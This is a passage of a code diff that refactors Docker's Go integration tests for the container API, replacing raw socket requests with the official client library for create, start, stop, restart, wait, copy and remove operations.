+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	status, _, err := sockRequest("POST", "/containers/"+name+"/restart?t=1", nil)
+	timeout := 1 * time.Second
+	err = cli.ContainerRestart(context.Background(), name, &timeout)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
+
 	c.Assert(waitInspect(name, "{{ .State.Restarting  }} {{ .State.Running  }}", "false true", 15*time.Second), checker.IsNil)
 }
 
 func (s *DockerSuite) TestContainerAPIRestartNotimeoutParam(c *check.C) {
 	name := "test-api-restart-no-timeout-param"
-	out, _ := runSleepingContainer(c, "-di", "--name", name)
+	out := runSleepingContainer(c, "-di", "--name", name)
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
 
-	status, _, err := sockRequest("POST", "/containers/"+name+"/restart", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
+	defer cli.Close()
+
+	err = cli.ContainerRestart(context.Background(), name, nil)
+	c.Assert(err, checker.IsNil)
+
 	c.Assert(waitInspect(name, "{{ .State.Restarting  }} {{ .State.Running  }}", "false true", 15*time.Second), checker.IsNil)
 }
 
 func (s *DockerSuite) TestContainerAPIStart(c *check.C) {
 	name := "testing-start"
-	config := map[string]interface{}{
-		"Image":     "busybox",
-		"Cmd":       append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...),
-		"OpenStdin": true,
+	config := containertypes.Config{
+		Image:     "busybox",
+		Cmd:       append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...),
+		OpenStdin: true,
 	}
 
-	status, _, err := sockRequest("POST", "/containers/create?name="+name, config)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, name)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
 
-	status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil)
+	err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{})
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 
 	// second call to start should give 304
-	status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil)
+	// maybe add ContainerStartWithRaw to test it
+	err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{})
 	c.Assert(err, checker.IsNil)
 
 	// TODO(tibor): figure out why this doesn't work on windows
-	if isLocalDaemon {
-		c.Assert(status, checker.Equals, http.StatusNotModified)
-	}
 }
 
 func (s *DockerSuite) TestContainerAPIStop(c *check.C) {
 	name := "test-api-stop"
 	runSleepingContainer(c, "-i", "--name", name)
+	timeout := 30 * time.Second
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	status, _, err := sockRequest("POST", "/containers/"+name+"/stop?t=30", nil)
+	err = cli.ContainerStop(context.Background(), name, &timeout)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 	c.Assert(waitInspect(name, "{{ .State.Running  }}", "false", 60*time.Second), checker.IsNil)
 
 	// second call to start should give 304
-	status, _, err = sockRequest("POST", "/containers/"+name+"/stop?t=30", nil)
+	// maybe add ContainerStartWithRaw to test it
+	err = cli.ContainerStop(context.Background(), name, &timeout)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotModified)
 }
 
 func (s *DockerSuite) TestContainerAPIWait(c *check.C) {
 	name := "test-api-wait"
 
 	sleepCmd := "/bin/sleep"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		sleepCmd = "sleep"
 	}
 	dockerCmd(c, "run", "--name", name, "busybox", sleepCmd, "2")
 
-	status, body, err := sockRequest("POST", "/containers/"+name+"/wait", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	c.Assert(waitInspect(name, "{{ .State.Running  }}", "false", 60*time.Second), checker.IsNil)
+	defer cli.Close()
+
+	waitresC, errC := cli.ContainerWait(context.Background(), name, "")
 
-	var waitres containertypes.ContainerWaitOKBody
-	c.Assert(json.Unmarshal(body, &waitres), checker.IsNil)
-	c.Assert(waitres.StatusCode, checker.Equals, int64(0))
+	select {
+	case err = <-errC:
+		c.Assert(err, checker.IsNil)
+	case waitres := <-waitresC:
+		c.Assert(waitres.StatusCode, checker.Equals, int64(0))
+	}
 }
 
 func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) {
@@ -985,10 +1074,10 @@ func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) {
 	postData := types.CopyConfig{
 		Resource: "/test.txt",
 	}
-
-	status, _, err := sockRequest("POST", "/containers/"+name+"/copy", postData)
+	// no copy in client/
+	res, _, err := request.Post("/containers/"+name+"/copy", request.JSONBody(postData))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotFound)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound)
 }
 
 func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) {
@@ -1000,12 +1089,12 @@ func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) {
 		Resource: "/test.txt",
 	}
 
-	status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData)
+	res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
 	found := false
-	for tarReader := tar.NewReader(bytes.NewReader(body)); ; {
+	for tarReader := tar.NewReader(body); ; {
 		h, err := tarReader.Next()
 		if err != nil {
 			if err == io.EOF {
@@ -1021,7 +1110,7 @@ func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) {
 	c.Assert(found, checker.True)
 }
 
-func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) {
+func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPre124(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
 	name := "test-container-api-copy-resource-empty"
 	dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt")
@@ -1030,10 +1119,16 @@ func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) {
 		Resource: "",
 	}
 
-	status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData)
+	res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
-	c.Assert(string(body), checker.Matches, "Path cannot be empty\n")
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
+	b, err := request.ReadBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Matches, "Path cannot be empty\n")
 }
 
 func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) {
@@ -1045,10 +1140,16 @@ func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C)
 		Resource: "/notexist",
 	}
 
-	status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData)
+	res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData))
+	c.Assert(err, checker.IsNil)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound)
+	}
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
-	c.Assert(string(body), checker.Matches, "Could not find the file /notexist in container "+name+"\n")
+	c.Assert(string(b), checker.Matches, "Could not find the file /notexist in container "+name+"\n")
 }
 
 func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) {
@@ -1057,40 +1158,51 @@ func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) {
 		Resource: "/something",
 	}
 
-	status, _, err := sockRequest("POST", "/v1.23/containers/notexists/copy", postData)
+	res, _, err := request.Post("/v1.23/containers/notexists/copy", request.JSONBody(postData))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotFound)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound)
 }
 
 func (s *DockerSuite) TestContainerAPIDelete(c *check.C) {
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
 
 	dockerCmd(c, "stop", id)
 
-	status, _, err := sockRequest("DELETE", "/containers/"+id, nil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	err = cli.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{})
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 }
 
 func (s *DockerSuite) TestContainerAPIDeleteNotExist(c *check.C) {
-	status, body, err := sockRequest("DELETE", "/containers/doesnotexist", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotFound)
-	c.Assert(getErrorMessage(c, body), checker.Matches, "No such container: doesnotexist")
+	defer cli.Close()
+
+	err = cli.ContainerRemove(context.Background(), "doesnotexist", types.ContainerRemoveOptions{})
+	c.Assert(err.Error(), checker.Contains, "No such container: doesnotexist")
 }
 
 func (s *DockerSuite) TestContainerAPIDeleteForce(c *check.C) {
-	out, _ := runSleepingContainer(c)
-
+	out := runSleepingContainer(c)
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
 
-	status, _, err := sockRequest("DELETE", "/containers/"+id+"?force=1", nil)
+	removeOptions := types.ContainerRemoveOptions{
+		Force: true,
+	}
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	err = cli.ContainerRemove(context.Background(), id, removeOptions)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 }
 
 func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) {
@@ -1109,34 +1221,45 @@ func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) {
 	links := inspectFieldJSON(c, id2, "HostConfig.Links")
 	c.Assert(links, checker.Equals, "[\"/tlink1:/tlink2/tlink1\"]", check.Commentf("expected to have links between containers"))
 
-	status, b, err := sockRequest("DELETE", "/containers/tlink2/tlink1?link=1", nil)
+	removeOptions := types.ContainerRemoveOptions{
+		RemoveLinks: true,
+	}
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	err = cli.ContainerRemove(context.Background(), "tlink2/tlink1", removeOptions)
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusNoContent, check.Commentf(string(b)))
 
 	linksPostRm := inspectFieldJSON(c, id2, "HostConfig.Links")
 	c.Assert(linksPostRm, checker.Equals, "null", check.Commentf("call to api deleteContainer links should have removed the specified links"))
 }
 
 func (s *DockerSuite) TestContainerAPIDeleteConflict(c *check.C) {
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
 
-	status, _, err := sockRequest("DELETE", "/containers/"+id, nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusConflict)
+	defer cli.Close()
+
+	err = cli.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{})
+	expected := "cannot remove a running container"
+	c.Assert(err.Error(), checker.Contains, expected)
 }
 
 func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) {
 	testRequires(c, SameHostDaemon)
 
 	vol := "/testvolume"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		vol = `c:\testvolume`
 	}
 
-	out, _ := runSleepingContainer(c, "-v", vol)
+	out := runSleepingContainer(c, "-v", vol)
 
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
@@ -1145,73 +1268,81 @@ func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) {
 	_, err = os.Stat(source)
 	c.Assert(err, checker.IsNil)
 
-	status, _, err := sockRequest("DELETE", "/containers/"+id+"?v=1&force=1", nil)
+	removeOptions := types.ContainerRemoveOptions{
+		Force:         true,
+		RemoveVolumes: true,
+	}
+
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
+	defer cli.Close()
+
+	err = cli.ContainerRemove(context.Background(), id, removeOptions)
+	c.Assert(err, check.IsNil)
+
 	_, err = os.Stat(source)
 	c.Assert(os.IsNotExist(err), checker.True, check.Commentf("expected to get ErrNotExist error, got %v", err))
 }
 
 // Regression test for https://github.com/docker/docker/issues/6231
 func (s *DockerSuite) TestContainerAPIChunkedEncoding(c *check.C) {
-	conn, err := sockConn(time.Duration(10*time.Second), "")
-	c.Assert(err, checker.IsNil)
-	client := httputil.NewClientConn(conn, nil)
-	defer client.Close()
 
 	config := map[string]interface{}{
 		"Image":     "busybox",
 		"Cmd":       append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...),
 		"OpenStdin": true,
 	}
-	b, err := json.Marshal(config)
-	c.Assert(err, checker.IsNil)
-
-	req, err := http.NewRequest("POST", "/containers/create", bytes.NewBuffer(b))
-	c.Assert(err, checker.IsNil)
-	req.Header.Set("Content-Type", "application/json")
-	// This is a cheat to make the http request do chunked encoding
-	// Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite
-	// https://golang.org/src/pkg/net/http/request.go?s=11980:12172
-	req.ContentLength = -1
 
-	resp, err := client.Do(req)
+	resp, _, err := request.Post("/containers/create", request.JSONBody(config), request.With(func(req *http.Request) error {
+		// This is a cheat to make the http request do chunked encoding
+		// Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite
+		// https://golang.org/src/pkg/net/http/request.go?s=11980:12172
+		req.ContentLength = -1
+		return nil
+	}))
 	c.Assert(err, checker.IsNil, check.Commentf("error creating container with chunked encoding"))
-	resp.Body.Close()
+	defer resp.Body.Close()
 	c.Assert(resp.StatusCode, checker.Equals, http.StatusCreated)
 }
 
 func (s *DockerSuite) TestContainerAPIPostContainerStop(c *check.C) {
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 
 	containerID := strings.TrimSpace(out)
 	c.Assert(waitRun(containerID), checker.IsNil)
 
-	statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/stop", nil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	err = cli.ContainerStop(context.Background(), containerID, nil)
 	c.Assert(err, checker.IsNil)
-	// 204 No Content is expected, not 200
-	c.Assert(statusCode, checker.Equals, http.StatusNoContent)
 	c.Assert(waitInspect(containerID, "{{ .State.Running  }}", "false", 60*time.Second), checker.IsNil)
 }
 
 // #14170
 func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *check.C) {
-	config := struct {
-		Image      string
-		Entrypoint string
-		Cmd        []string
-	}{"busybox", "echo", []string{"hello", "world"}}
-	_, _, err := sockRequest("POST", "/containers/create?name=echotest", config)
+	config := containertypes.Config{
+		Image:      "busybox",
+		Entrypoint: []string{"echo"},
+		Cmd:        []string{"hello", "world"},
+	}
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "echotest")
 	c.Assert(err, checker.IsNil)
 	out, _ := dockerCmd(c, "start", "-a", "echotest")
 	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
 
 	config2 := struct {
 		Image      string
-		Entrypoint []string
+		Entrypoint string
 		Cmd        []string
-	}{"busybox", []string{"echo"}, []string{"hello", "world"}}
-	_, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2)
+	}{"busybox", "echo", []string{"hello", "world"}}
+	_, _, err = request.Post("/containers/create?name=echotest2", request.JSONBody(config2))
 	c.Assert(err, checker.IsNil)
 	out, _ = dockerCmd(c, "start", "-a", "echotest2")
 	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
@@ -1219,21 +1350,26 @@ func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *c
 
 // #14170
 func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCmd(c *check.C) {
-	config := struct {
-		Image      string
-		Entrypoint string
-		Cmd        string
-	}{"busybox", "echo", "hello world"}
-	_, _, err := sockRequest("POST", "/containers/create?name=echotest", config)
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"echo", "hello", "world"},
+	}
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "echotest")
 	c.Assert(err, checker.IsNil)
 	out, _ := dockerCmd(c, "start", "-a", "echotest")
 	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
 
 	config2 := struct {
-		Image string
-		Cmd   []string
-	}{"busybox", []string{"echo", "hello", "world"}}
-	_, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2)
+		Image      string
+		Entrypoint string
+		Cmd        string
+	}{"busybox", "echo", "hello world"}
+	_, _, err = request.Post("/containers/create?name=echotest2", request.JSONBody(config2))
 	c.Assert(err, checker.IsNil)
 	out, _ = dockerCmd(c, "start", "-a", "echotest2")
 	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
@@ -1248,29 +1384,38 @@ func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCapAddDrop(c *che
 		CapAdd  string
 		CapDrop string
 	}{"busybox", "NET_ADMIN", "SYS_ADMIN"}
-	status, _, err := sockRequest("POST", "/containers/create?name=capaddtest0", config)
+	res, _, err := request.Post("/containers/create?name=capaddtest0", request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
 
-	config2 := struct {
-		Image   string
-		CapAdd  []string
-		CapDrop []string
-	}{"busybox", []string{"NET_ADMIN", "SYS_ADMIN"}, []string{"SETGID"}}
-	status, _, err = sockRequest("POST", "/containers/create?name=capaddtest1", config2)
+	config2 := containertypes.Config{
+		Image: "busybox",
+	}
+	hostConfig := containertypes.HostConfig{
+		CapAdd:  []string{"NET_ADMIN", "SYS_ADMIN"},
+		CapDrop: []string{"SETGID"},
+	}
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config2, &hostConfig, &networktypes.NetworkingConfig{}, "capaddtest1")
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
 }
 
 // #14915
 func (s *DockerSuite) TestContainerAPICreateNoHostConfig118(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows only support 1.25 or later
-	config := struct {
-		Image string
-	}{"busybox"}
-	status, _, err := sockRequest("POST", "/v1.18/containers/create", config)
+	config := containertypes.Config{
+		Image: "busybox",
+	}
+
+	cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("v1.18"))
+	c.Assert(err, checker.IsNil)
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "")
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
 }
 
 // Ensure an error occurs when you have a container read-only rootfs but you
@@ -1291,93 +1436,87 @@ func (s *DockerSuite) TestPutContainerArchiveErrSymlinkInVolumeToReadOnlyRootfs(
 		readOnly: true,
 		volumes:  defaultVolumes(testVol), // Our bind mount is at /vol2
 	})
-	defer deleteContainer(cID)
 
 	// Attempt to extract to a symlink in the volume which points to a
 	// directory outside the volume. This should cause an error because the
 	// rootfs is read-only.
-	query := make(url.Values, 1)
-	query.Set("path", "/vol2/symlinkToAbsDir")
-	urlPath := fmt.Sprintf("/v1.20/containers/%s/archive?%s", cID, query.Encode())
-
-	statusCode, body, err := sockRequest("PUT", urlPath, nil)
+	var httpClient *http.Client
+	cli, err := client.NewClient(daemonHost(), "v1.20", httpClient, map[string]string{})
 	c.Assert(err, checker.IsNil)
 
-	if !isCpCannotCopyReadOnly(fmt.Errorf(string(body))) {
-		c.Fatalf("expected ErrContainerRootfsReadonly error, but got %d: %s", statusCode, string(body))
-	}
-}
-
-func (s *DockerSuite) TestContainerAPIGetContainersJSONEmpty(c *check.C) {
-	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	c.Assert(string(body), checker.Equals, "[]\n")
+	err = cli.CopyToContainer(context.Background(), cID, "/vol2/symlinkToAbsDir", nil, types.CopyToContainerOptions{})
+	c.Assert(err.Error(), checker.Contains, "container rootfs is marked read-only")
 }
 
 func (s *DockerSuite) TestPostContainersCreateWithWrongCpusetValues(c *check.C) {
 	// Not supported on Windows
 	testRequires(c, DaemonIsLinux)
 
-	c1 := struct {
-		Image      string
-		CpusetCpus string
-	}{"busybox", "1-42,,"}
-	name := "wrong-cpuset-cpus"
-	status, body, err := sockRequest("POST", "/containers/create?name="+name, c1)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	defer cli.Close()
+
+	config := containertypes.Config{
+		Image: "busybox",
+	}
+	hostConfig1 := containertypes.HostConfig{
+		Resources: containertypes.Resources{
+			CpusetCpus: "1-42,,",
+		},
+	}
+	name := "wrong-cpuset-cpus"
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig1, &networktypes.NetworkingConfig{}, name)
 	expected := "Invalid value 1-42,, for cpuset cpus"
-	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+	c.Assert(err.Error(), checker.Contains, expected)
 
-	c2 := struct {
-		Image      string
-		CpusetMems string
-	}{"busybox", "42-3,1--"}
+	hostConfig2 := containertypes.HostConfig{
+		Resources: containertypes.Resources{
+			CpusetMems: "42-3,1--",
+		},
+	}
 	name = "wrong-cpuset-mems"
-	status, body, err = sockRequest("POST", "/containers/create?name="+name, c2)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig2, &networktypes.NetworkingConfig{}, name)
 	expected = "Invalid value 42-3,1-- for cpuset mems"
-	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+	c.Assert(err.Error(), checker.Contains, expected)
 }
 
 func (s *DockerSuite) TestPostContainersCreateShmSizeNegative(c *check.C) {
 	// ShmSize is not supported on Windows
 	testRequires(c, DaemonIsLinux)
-	config := map[string]interface{}{
-		"Image":      "busybox",
-		"HostConfig": map[string]interface{}{"ShmSize": -1},
+	config := containertypes.Config{
+		Image: "busybox",
+	}
+	hostConfig := containertypes.HostConfig{
+		ShmSize: -1,
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
-	c.Assert(getErrorMessage(c, body), checker.Contains, "SHM size can not be less than 0")
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "")
+	c.Assert(err.Error(), checker.Contains, "SHM size can not be less than 0")
 }
 
 func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check.C) {
 	// ShmSize is not supported on Windows
 	testRequires(c, DaemonIsLinux)
 	var defaultSHMSize int64 = 67108864
-	config := map[string]interface{}{
-		"Image": "busybox",
-		"Cmd":   "mount",
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"mount"},
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusCreated)
-
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "")
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusOK)
 
-	var containerJSON types.ContainerJSON
-	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+	containerJSON, err := cli.ContainerInspect(context.Background(), container.ID)
+	c.Assert(err, check.IsNil)
 
 	c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, defaultSHMSize)
 
@@ -1391,25 +1530,20 @@ func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check.
 func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) {
 	// ShmSize is not supported on Windows
 	testRequires(c, DaemonIsLinux)
-	config := map[string]interface{}{
-		"Image":      "busybox",
-		"HostConfig": map[string]interface{}{},
-		"Cmd":        "mount",
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"mount"},
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusCreated)
-
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "")
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusOK)
 
-	var containerJSON types.ContainerJSON
-	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+	containerJSON, err := cli.ContainerInspect(context.Background(), container.ID)
+	c.Assert(err, check.IsNil)
 
 	c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(67108864))
 
@@ -1423,25 +1557,24 @@ func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) {
 func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) {
 	// ShmSize is not supported on Windows
 	testRequires(c, DaemonIsLinux)
-	config := map[string]interface{}{
-		"Image":      "busybox",
-		"Cmd":        "mount",
-		"HostConfig": map[string]interface{}{"ShmSize": 1073741824},
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"mount"},
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusCreated)
+	hostConfig := containertypes.HostConfig{
+		ShmSize: 1073741824,
+	}
 
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "")
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusOK)
 
-	var containerJSON types.ContainerJSON
-	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+	containerJSON, err := cli.ContainerInspect(context.Background(), container.ID)
+	c.Assert(err, check.IsNil)
 
 	c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(1073741824))
 
@@ -1455,25 +1588,25 @@ func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) {
 func (s *DockerSuite) TestPostContainersCreateMemorySwappinessHostConfigOmitted(c *check.C) {
 	// Swappiness is not supported on Windows
 	testRequires(c, DaemonIsLinux)
-	config := map[string]interface{}{
-		"Image": "busybox",
+	config := containertypes.Config{
+		Image: "busybox",
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusCreated)
-
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "")
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusOK)
 
-	var containerJSON types.ContainerJSON
